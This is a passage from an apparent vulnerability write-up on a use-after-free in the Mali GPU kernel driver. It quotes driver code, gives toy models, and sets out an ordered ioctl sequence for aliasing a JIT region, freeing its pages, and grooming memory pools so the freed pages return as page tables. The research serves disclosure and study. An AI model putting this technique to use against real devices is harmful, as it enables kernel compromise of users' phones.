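/* Hypothetical model of the state that matters for one JIT region. */
struct model_jit_region {
	size_t nents;          /* physical pages currently backing the region */
	size_t initial_commit; /* floor that a free will not shrink below */
	int active;            /* 1 while on the active list, 0 in the pool */
};

/* Step 3: a fresh allocation is backed by commit_pages pages. */
static void model_alloc_new(struct model_jit_region *r, size_t commit_pages)
{
	r->nents = commit_pages;
	r->initial_commit = commit_pages;
	r->active = 1;
}

/* Step 5: reuse from the pool, mirroring the kbase_jit_grow logic above.
 * The backing only grows; initial_commit is always overwritten. */
static void model_reuse(struct model_jit_region *r, size_t commit_pages)
{
	if (r->nents < commit_pages)
		r->nents = commit_pages; /* slow path: allocate more pages */
	r->initial_commit = commit_pages; /* fast path still updates this */
	r->active = 1;
}

/* Steps 4 and 6: move the region to the pool and, if it is backed by more
 * pages than initial_commit, shrink it. ASSUMPTION: the shrink target is
 * max(initial_commit, nents * (100 - trim_level) / 100).
 * Returns the number of pages released. */
static size_t model_free(struct model_jit_region *r, unsigned int trim_level)
{
	size_t old_pages = r->nents;

	if (trim_level > 100)
		trim_level = 100;
	r->active = 0;

	if (r->initial_commit < old_pages) {
		size_t trimmed = old_pages * (100 - trim_level) / 100;

		r->nents = trimmed > r->initial_commit ? trimmed :
							  r->initial_commit;
	}
	return old_pages - r->nents;
}
```

<p>In this model, allocating with 16 pages and freeing releases nothing, because <code class="language-plaintext highlighter-rouge">initial_commit</code> equals the backing size. Reusing the region with a <code class="language-plaintext highlighter-rouge">commit_pages</code> of 1 leaves the 16 pages in place but lowers <code class="language-plaintext highlighter-rouge">initial_commit</code>, so the next free is the one that actually shrinks the backing.</p>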

<p>Recall that <code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code> will try to free physical pages back to the <code class="language-plaintext highlighter-rouge">kbase_context</code> mem_pool, then
the <code class="language-plaintext highlighter-rouge">kbase_device</code> mem_pool and finally the kernel, depending on whether the pool at each
stage is full. So, if another region were using the same backing physical
pages and was unaware of the shrinkage, its GPU page table mappings would
end up pointing to pages that have already been freed. To get such a second region that points
to the same backing physical pages, we can use memory aliasing, as previously covered.</p>

<p>When an alias region is created in <code class="language-plaintext highlighter-rouge">kbase_mem_alias</code>, the physical allocation of the target (aliased) region is retrieved and stored [1]. When the alias region is later mapped with <code class="language-plaintext highlighter-rouge">mmap</code> in order to insert its GPU page table entries, each virtual page frame number (<code class="language-plaintext highlighter-rouge">vpfn</code>) is simply mapped to the pages of that previously stored physical allocation [2], so the page table entries for the alias region point to the same underlying pages as the target region. However, as previously mentioned, <code class="language-plaintext highlighter-rouge">kbase_mem_alias</code> refuses to alias JIT regions because they have the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag set [3]. This flag is intended to protect JIT regions from being aliased and, per the comments, it is assumed to cover the entire lifetime of such regions.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">u64</span> <span class="nf">kbase_mem_alias</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="n">u64</span> <span class="o">*</span><span class="n">flags</span><span class="p">,</span> <span class="n">u64</span> <span class="n">stride</span><span class="p">,</span>
	    <span class="n">u64</span> <span class="n">nents</span><span class="p">,</span> <span class="k">struct</span> <span class="n">base_mem_aliasing_info</span> <span class="o">*</span><span class="n">ai</span><span class="p">,</span>
	    <span class="n">u64</span> <span class="o">*</span><span class="n">num_pages</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">aliasing_reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">KBASE_REG_NO_USER_FREE</span><span class="p">)</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
				<span class="k">goto</span> <span class="n">bad_handle</span><span class="p">;</span> <span class="cm">/* JIT regions can't be
						  * aliased. NO_USER_FREE flag
						  * covers the entire lifetime
						  * of JIT regions. The other
						  * types of regions covered
						  * by this flag also shall
						  * not be aliased.
						  */</span>
	<span class="p">...</span>
	<span class="n">alloc</span> <span class="o">=</span> <span class="n">aliasing_reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="p">;</span> <span class="c1">// aliasing_reg is the target region we want to alias</span>
	<span class="p">...</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">aliased</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">alloc</span> <span class="o">=</span> <span class="n">kbase_mem_phy_alloc_get</span><span class="p">(</span><span class="n">alloc</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">aliased</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">length</span> <span class="o">=</span> <span class="n">ai</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">length</span><span class="p">;</span>
	<span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">aliased</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">offset</span> <span class="o">=</span> <span class="n">ai</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">offset</span><span class="p">;</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_gpu_mmap</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">reg</span><span class="p">,</span>
		   <span class="n">u64</span> <span class="n">addr</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">nr_pages</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">align</span><span class="p">,</span>
		   <span class="k">enum</span> <span class="n">kbase_caller_mmu_sync_info</span> <span class="n">mmu_sync_info</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="o">-&gt;</span><span class="n">type</span> <span class="o">==</span> <span class="n">KBASE_MEM_TYPE_ALIAS</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">u64</span> <span class="k">const</span> <span class="n">stride</span> <span class="o">=</span> <span class="n">alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">stride</span><span class="p">;</span>

		<span class="n">KBASE_DEBUG_ASSERT</span><span class="p">(</span><span class="n">alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">aliased</span><span class="p">);</span>
		<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">nents</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">aliased</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">alloc</span><span class="p">)</span> <span class="p">{</span>
				<span class="n">err</span> <span class="o">=</span> <span class="n">kbase_mmu_insert_pages</span><span class="p">(</span>
					<span class="n">kctx</span><span class="o">-&gt;</span><span class="n">kbdev</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">mmu</span><span class="p">,</span>
					<span class="n">reg</span><span class="o">-&gt;</span><span class="n">start_pfn</span> <span class="o">+</span> <span class="p">(</span><span class="n">i</span> <span class="o">*</span> <span class="n">stride</span><span class="p">),</span> <span class="c1">// vpfn</span>
					<span class="n">alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">aliased</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="c1">// phys &lt;--- [2]</span>
						<span class="p">.</span><span class="n">alloc</span><span class="o">-&gt;</span><span class="n">pages</span> <span class="o">+</span>
					<span class="n">alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">aliased</span><span class="p">[</span><span class="n">i</span><span class="p">]</span>
						<span class="p">.</span><span class="n">offset</span><span class="p">,</span>
					<span class="n">alloc</span><span class="o">-&gt;</span><span class="n">imported</span><span class="p">.</span><span class="n">alias</span><span class="p">.</span><span class="n">aliased</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">length</span><span class="p">,</span>
					<span class="n">reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">gwt_mask</span><span class="p">,</span> <span class="n">kctx</span><span class="o">-&gt;</span><span class="n">as_nr</span><span class="p">,</span>
					<span class="n">group_id</span><span class="p">,</span> <span class="n">mmu_sync_info</span><span class="p">);</span>
				<span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="p">)</span>
					<span class="k">goto</span> <span class="n">bad_insert</span><span class="p">;</span>
			<span class="p">}</span>
			<span class="p">...</span>
		<span class="p">}</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>By making use of the vulnerability, we can remove the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag from a JIT region and create an alias region for it. After we alias the region and
<code class="language-plaintext highlighter-rouge">mmap</code> it to create the GPU page table entries, each GPU page table entry of the alias region points to the same backing physical page as the corresponding entry of the
JIT region (the figure assumes the JIT
region has 2 backing physical pages and <code class="language-plaintext highlighter-rouge">mem_alias</code> simply aliases the entire region).</p>

<p><img src="/assets/mali-csf-exploit/fig2-before-kbase-mem-shrink.png" alt="Before kbase_mem_shrink: both the alias region's VA pages and the JIT region's VA pages have valid GPU ATEs pointing to JIT region backing Phys Page 0 and Phys Page 1, which are not freed." /></p>

<p>If, for example, <code class="language-plaintext highlighter-rouge">kbase_jit_free</code> is then called on the JIT region while <code class="language-plaintext highlighter-rouge">reg-&gt;initial_commit</code> is set to 0, both backing pages will be freed when
<code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code> is invoked.</p>

<p><img src="/assets/mali-csf-exploit/fig3-after-kbase-mem-shrink.png" alt="After kbase_mem_shrink: the JIT region's GPU ATEs are invalidated and Phys Page 0 and Phys Page 1 are freed, but the alias region's GPU ATEs remain valid and still point to the freed physical pages." /></p>

<p>The alias region still has a valid GPU page table mapping in place, so GPU
writes to this memory region still land on the freed physical pages. When
<code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code> uses <code class="language-plaintext highlighter-rouge">kbase_free_phy_pages_helper</code> to free the physical pages, it
ultimately calls <code class="language-plaintext highlighter-rouge">kbase_mem_pool_free_pages</code>, as mentioned in the section <a href="#free_phy_pages_helper"><code class="language-plaintext highlighter-rouge">Memory
management and allocations in the GPU</code></a>. This returns the pages to the <code class="language-plaintext highlighter-rouge">kbase_context</code> <code class="language-plaintext highlighter-rouge">mem_pool</code>, the <code class="language-plaintext highlighter-rouge">kbase_device</code> <code class="language-plaintext highlighter-rouge">mem_pool</code> or the kernel, in that order, moving on to the next destination only when the previous pool is full. Pages returned to either <code class="language-plaintext highlighter-rouge">mem_pool</code> can easily be re-allocated as a region’s backing pages or as PGDs.</p>

<p>Concretely, to alias the JIT region before shrinking its backing pages, the following operations
have to be performed in order:</p>

<ol>
  <li>Perform the routine setup steps for a new <code class="language-plaintext highlighter-rouge">kbase_context</code></li>
  <li>Initialize the JIT configuration for the <code class="language-plaintext highlighter-rouge">kbase_context</code> using the
<code class="language-plaintext highlighter-rouge">KBASE_IOCTL_MEM_JIT_INIT</code> ioctl</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> to allocate a new region</li>
  <li>Make the region inactive using <code class="language-plaintext highlighter-rouge">kbase_jit_free</code></li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_allocate</code> to reuse the same region by specifying the same <code class="language-plaintext highlighter-rouge">usage_id</code>,
and set a lower value for <code class="language-plaintext highlighter-rouge">initial_commit</code> for the region</li>
  <li>Use <code class="language-plaintext highlighter-rouge">csf_queue_register_internal</code> (through the <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_REGISTER</code>
ioctl) to register a queue using the JIT region’s GPU address</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_csf_queue_terminate</code> (through the <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_TERMINATE</code> ioctl)
to terminate the queue and remove the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag from the JIT region</li>
  <li>Create an alias to the JIT region using <code class="language-plaintext highlighter-rouge">mem_alias</code> (through the <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_MEM_ALIAS</code>
ioctl) such that the alias region’s GPU VA pages are mapped to the backing physical
pages of the JIT region</li>
  <li>Use <code class="language-plaintext highlighter-rouge">kbase_jit_free</code> to shrink the JIT region’s backing pages through
<code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code>. At this point, the alias region still contains valid page table entries pointing to the freed
physical pages.</li>
</ol>
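
<p>The effect of steps 6 to 9 can be illustrated with a small user space toy model. This is only a sketch under stated assumptions, not driver code: every <code class="language-plaintext highlighter-rouge">toy_*</code> name is hypothetical, a "page table entry" is reduced to a pointer, and the reference counting on <code class="language-plaintext highlighter-rouge">kbase_mem_phy_alloc</code> is left out because it does not stop the shrink from freeing the pages.</p>

```c
#include <stdbool.h>
#include <stddef.h>

#define NR_PAGES 2
#define REG_NO_USER_FREE (1u << 0) /* stand-in for KBASE_REG_NO_USER_FREE */

/* Toy physical page: only tracks whether it has been freed. */
struct toy_page { bool freed; };

/* Toy region: one "page table entry" per page (NULL means invalid). */
struct toy_region {
	unsigned int flags;
	struct toy_page *pte[NR_PAGES];
};

/* Aliasing is refused while the target is marked NO_USER_FREE. */
static bool toy_alias(struct toy_region *alias, const struct toy_region *target)
{
	if (target->flags & REG_NO_USER_FREE)
		return false;
	for (size_t i = 0; i < NR_PAGES; i++)
		alias->pte[i] = target->pte[i];
	return true;
}

/* The bug: terminating a queue clears the flag, even on a JIT region. */
static void toy_queue_terminate(struct toy_region *reg)
{
	reg->flags &= ~REG_NO_USER_FREE;
}

/* Shrink to zero pages: tears down only this region's own entries. */
static void toy_shrink(struct toy_region *reg)
{
	for (size_t i = 0; i < NR_PAGES; i++) {
		if (reg->pte[i]) {
			reg->pte[i]->freed = true;
			reg->pte[i] = NULL;
		}
	}
}

/* Count entries that are still valid but point at freed pages. */
static size_t toy_dangling(const struct toy_region *reg)
{
	size_t n = 0;

	for (size_t i = 0; i < NR_PAGES; i++)
		if (reg->pte[i] && reg->pte[i]->freed)
			n++;
	return n;
}

/* Runs the sequence and returns the number of dangling alias entries. */
size_t toy_run(bool trigger_bug)
{
	struct toy_page pages[NR_PAGES] = { { false }, { false } };
	struct toy_region jit = { REG_NO_USER_FREE, { &pages[0], &pages[1] } };
	struct toy_region alias = { 0, { NULL, NULL } };

	if (trigger_bug)
		toy_queue_terminate(&jit); /* steps 6 and 7 */
	toy_alias(&alias, &jit);           /* step 8 */
	toy_shrink(&jit);                  /* step 9 */
	return toy_dangling(&alias);
}
```

<p>Calling <code class="language-plaintext highlighter-rouge">toy_run(true)</code> leaves both alias entries pointing at freed pages, while <code class="language-plaintext highlighter-rouge">toy_run(false)</code> leaves none because the alias is refused while the flag is still set.</p>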

<h1 id="preparing-for-the-exploit">Preparing for the exploit</h1>

<p>As highlighted in the section <a href="#pgd_alloc_for_exp"><code class="language-plaintext highlighter-rouge">Memory management and allocations in the GPU driver</code></a>, we can force the
allocation of a new level 3 PGD by performing a memory allocation of more than 512 pages. This
allows us to reuse the freed physical pages from before as new PGDs instead of backing pages for a region. PGDs are allocated from the <code class="language-plaintext highlighter-rouge">kbase_device</code> <code class="language-plaintext highlighter-rouge">mem_pool</code> and not the <code class="language-plaintext highlighter-rouge">kbase_context</code> <code class="language-plaintext highlighter-rouge">mem_pool</code>, so we have to ensure that <code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code> frees the backing physical pages to the device pool instead. To achieve this, the
<code class="language-plaintext highlighter-rouge">kbase_context</code> <code class="language-plaintext highlighter-rouge">mem_pool</code> must be full at the point of freeing in <code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code>. The maximum capacity of a <code class="language-plaintext highlighter-rouge">kbase_context</code> <code class="language-plaintext highlighter-rouge">mem_pool</code> is
defined as <code class="language-plaintext highlighter-rouge">KBASE_MEM_POOL_MAX_SIZE_KCTX</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*
 * Max size for kbdev memory pool (in pages)
 */</span>
<span class="cp">#define KBASE_MEM_POOL_MAX_SIZE_KBDEV (SZ_64M &gt;&gt; PAGE_SHIFT)
</span>
<span class="cm">/*
 * Max size for kctx memory pool (in pages)
 */</span>
<span class="cp">#define KBASE_MEM_POOL_MAX_SIZE_KCTX  (SZ_64M &gt;&gt; PAGE_SHIFT)
</span></code></pre></div></div>
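
<p>As a quick check of what these macros evaluate to, the shift can be reproduced in user space. This is a minimal sketch: the <code class="language-plaintext highlighter-rouge">toy_*</code> names are hypothetical, and the page shift of 12 (4 KiB pages) is an assumption about the target kernel rather than something taken from the driver headers.</p>

```c
#include <stddef.h>

#define TOY_SZ_64M     0x04000000UL /* same value as the kernel's SZ_64M */
#define TOY_PAGE_SHIFT 12           /* assumption: 4 KiB pages */

/* Number of pages that a pool of the given byte size can hold. */
size_t toy_pool_max_pages(unsigned long bytes, unsigned int page_shift)
{
	return (size_t)(bytes >> page_shift);
}
```

<p>With these values, <code class="language-plaintext highlighter-rouge">toy_pool_max_pages(TOY_SZ_64M, TOY_PAGE_SHIFT)</code> gives the number of pages needed to fill a pool completely. A kernel built with a larger page size would need fewer pages.</p>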

<p><code class="language-plaintext highlighter-rouge">SZ_64M</code> is simply <code class="language-plaintext highlighter-rouge">0x04000000</code> (<a href="https://cs.android.com/android/kernel/superproject/+/android-gs-pantah-5.10-android13-qpr1:private/gs-google/include/linux/sizes.h;l=38">here</a>), so with 4 KiB pages (a <code class="language-plaintext highlighter-rouge">PAGE_SHIFT</code> of 12) the max pool size works out to be 16384 pages. A new
<code class="language-plaintext highlighter-rouge">kbase_context</code> always starts with 0 pages in the <code class="language-plaintext highlighter-rouge">kbase_context</code> <code class="language-plaintext highlighter-rouge">mem_pool</code>, so by allocating a
region of 16384 pages and then unmapping the region, we can fill the context’s entire <code class="language-plaintext highlighter-rouge">mem_pool</code>.
Doing this right before the second call to <code class="language-plaintext highlighter-rouge">kbase_jit_free</code> in the steps above causes the pages freed during the
JIT free to be returned to the <code class="language-plaintext highlighter-rouge">kbase_device</code> <code class="language-plaintext highlighter-rouge">mem_pool</code> instead of the <code class="language-plaintext highlighter-rouge">kbase_context</code>
<code class="language-plaintext highlighter-rouge">mem_pool</code>, as mentioned <a href="#pool_free">here</a>. Unmapping the region can be done with a simple call to <code class="language-plaintext highlighter-rouge">munmap</code> on the region’s GPU
address returned from <code class="language-plaintext highlighter-rouge">mmap</code>. <code class="language-plaintext highlighter-rouge">munmap</code> on a GPU VA region delegates handling to
<code class="language-plaintext highlighter-rouge">kbase_cpu_vm_close</code>, which calls <code class="language-plaintext highlighter-rouge">kbase_mem_free_region</code> to tear down the
GPU page table entries and to free the backing physical pages if no
references remain to their <code class="language-plaintext highlighter-rouge">kbase_mem_phy_alloc</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">kbase_cpu_vm_close</span><span class="p">(</span><span class="k">struct</span> <span class="n">vm_area_struct</span> <span class="o">*</span><span class="n">vma</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">current</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">PF_EXITING</span><span class="p">))</span>
		<span class="n">kbase_mem_free_region</span><span class="p">(</span><span class="n">map</span><span class="o">-&gt;</span><span class="n">kctx</span><span class="p">,</span> <span class="n">map</span><span class="o">-&gt;</span><span class="n">region</span><span class="p">);</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
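
<p>The spill-over behaviour that this trick relies on can be modelled with two counters. The sketch below is a simplification with hypothetical <code class="language-plaintext highlighter-rouge">toy_*</code> names: it tracks pool sizes only, and it assumes that the device pool has room for the pages that overflow from the context pool.</p>

```c
#include <stddef.h>

/* Toy pool: only sizes are tracked, not the pages themselves. */
struct toy_pool {
	size_t cur_size;
	size_t max_size;
	struct toy_pool *next_pool; /* context pool -> device pool -> NULL */
};

/* Free space left in a pool. */
static size_t toy_pool_room(const struct toy_pool *pool)
{
	return pool->max_size - pool->cur_size;
}

/*
 * Hands nr_pages to the pool chain and returns how many fell through
 * to the kernel because every pool in the chain was full.
 */
size_t toy_pool_free_pages(struct toy_pool *pool, size_t nr_pages)
{
	while (pool && nr_pages) {
		size_t room = toy_pool_room(pool);
		size_t take = nr_pages < room ? nr_pages : room;

		pool->cur_size += take;
		nr_pages -= take;
		pool = pool->next_pool;
	}
	return nr_pages;
}
```

<p>Freeing 16384 pages into an empty context pool fills it exactly. Any pages freed afterwards, such as the two JIT backing pages, skip the context pool and land in the device pool.</p>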

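<p>Freeing pages to a pool involves calling <code class="language-plaintext highlighter-rouge">kbase_mem_pool_add_array</code>, which walks the pages
beginning from the first page (page 0), inserts each one at the head of a temporary list (<code class="language-plaintext highlighter-rouge">new_page_list</code>) using <code class="language-plaintext highlighter-rouge">list_add</code>, and then calls
<code class="language-plaintext highlighter-rouge">kbase_mem_pool_add_list</code>, passing in the temporary list. Because each page is inserted at the head, the temporary list ends up in reverse order, with the last page at the front.</p>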

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">kbase_mem_pool_add_array</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_mem_pool</span> <span class="o">*</span><span class="n">pool</span><span class="p">,</span>
				     <span class="kt">size_t</span> <span class="n">nr_pages</span><span class="p">,</span> <span class="k">struct</span> <span class="n">tagged_addr</span> <span class="o">*</span><span class="n">pages</span><span class="p">,</span>
				     <span class="n">bool</span> <span class="n">zero</span><span class="p">,</span> <span class="n">bool</span> <span class="n">sync</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
	<span class="cm">/* Zero/sync pages first without holding the pool lock */</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">nr_pages</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="o">!</span><span class="n">as_phys_addr_t</span><span class="p">(</span><span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">])))</span>
			<span class="k">continue</span><span class="p">;</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">is_huge_head</span><span class="p">(</span><span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">])</span> <span class="o">||</span> <span class="o">!</span><span class="n">is_huge</span><span class="p">(</span><span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">]))</span> <span class="p">{</span>
			<span class="n">p</span> <span class="o">=</span> <span class="n">as_page</span><span class="p">(</span><span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">zero</span><span class="p">)</span>
				<span class="n">kbase_mem_pool_zero_page</span><span class="p">(</span><span class="n">pool</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span>
			<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">sync</span><span class="p">)</span>
				<span class="n">kbase_mem_pool_sync_page</span><span class="p">(</span><span class="n">pool</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span>

			<span class="n">list_add</span><span class="p">(</span><span class="o">&amp;</span><span class="n">p</span><span class="o">-&gt;</span><span class="n">lru</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">new_page_list</span><span class="p">);</span>
			<span class="n">nr_to_pool</span><span class="o">++</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">as_tagged</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
	<span class="p">}</span>

	<span class="cm">/* Add new page list to pool */</span>
	<span class="n">kbase_mem_pool_add_list</span><span class="p">(</span><span class="n">pool</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">new_page_list</span><span class="p">,</span> <span class="n">nr_to_pool</span><span class="p">);</span>
      <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">kbase_mem_pool_add_list</code> simply takes the pool lock and calls
<code class="language-plaintext highlighter-rouge">kbase_mem_pool_add_list_locked</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">kbase_mem_pool_add_list_locked</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_mem_pool</span> <span class="o">*</span><span class="n">pool</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">page_list</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">nr_pages</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">lockdep_assert_held</span><span class="p">(</span><span class="o">&amp;</span><span class="n">pool</span><span class="o">-&gt;</span><span class="n">pool_lock</span><span class="p">);</span>

	<span class="n">list_splice</span><span class="p">(</span><span class="n">page_list</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pool</span><span class="o">-&gt;</span><span class="n">page_list</span><span class="p">);</span>
	<span class="n">pool</span><span class="o">-&gt;</span><span class="n">cur_size</span> <span class="o">+=</span> <span class="n">nr_pages</span><span class="p">;</span>

	<span class="n">pool_dbg</span><span class="p">(</span><span class="n">pool</span><span class="p">,</span> <span class="s">"added %zu pages</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">nr_pages</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The pages to be freed are spliced onto the head of the <code class="language-plaintext highlighter-rouge">pool-&gt;page_list</code> using <code class="language-plaintext highlighter-rouge">list_splice</code>,
so the next allocation of pages from the <code class="language-plaintext highlighter-rouge">kbase_device</code> pool will start with the pages
freed by <code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code>. This results in the following state of the mem pools for that
particular group.</p>

<p><img src="/assets/mali-csf-exploit/fig4-mem-pool-status.png" alt="Mem pool status for a group: the kbase_context mem_pool holds 16384 freed pages, while the kbase_device mem_pool's list head points to Freed page 1 (from mem_shrink), then Freed page 0 (from mem_shrink), then other freed pages." /></p>

<p>Allocation of a PGD is done through <a href="#alloc_pgd"><code class="language-plaintext highlighter-rouge">kbase_mmu_alloc_pgd</code></a>, which uses
<code class="language-plaintext highlighter-rouge">kbase_mem_pool_alloc</code> to retrieve a page from the <code class="language-plaintext highlighter-rouge">kbase_device</code> <code class="language-plaintext highlighter-rouge">mem_pool</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="nf">kbase_mem_pool_alloc</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_mem_pool</span> <span class="o">*</span><span class="n">pool</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">p</span><span class="p">;</span>

	<span class="k">do</span> <span class="p">{</span>
		<span class="n">pool_dbg</span><span class="p">(</span><span class="n">pool</span><span class="p">,</span> <span class="s">"alloc()</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
		<span class="n">p</span> <span class="o">=</span> <span class="n">kbase_mem_pool_remove</span><span class="p">(</span><span class="n">pool</span><span class="p">);</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">p</span><span class="p">)</span>
			<span class="k">return</span> <span class="n">p</span><span class="p">;</span>

		<span class="n">pool</span> <span class="o">=</span> <span class="n">pool</span><span class="o">-&gt;</span><span class="n">next_pool</span><span class="p">;</span>
	<span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="n">pool</span><span class="p">);</span>

	<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">kbase_mem_pool_remove</code> ultimately uses <code class="language-plaintext highlighter-rouge">kbase_mem_pool_remove_locked</code> to retrieve a page.
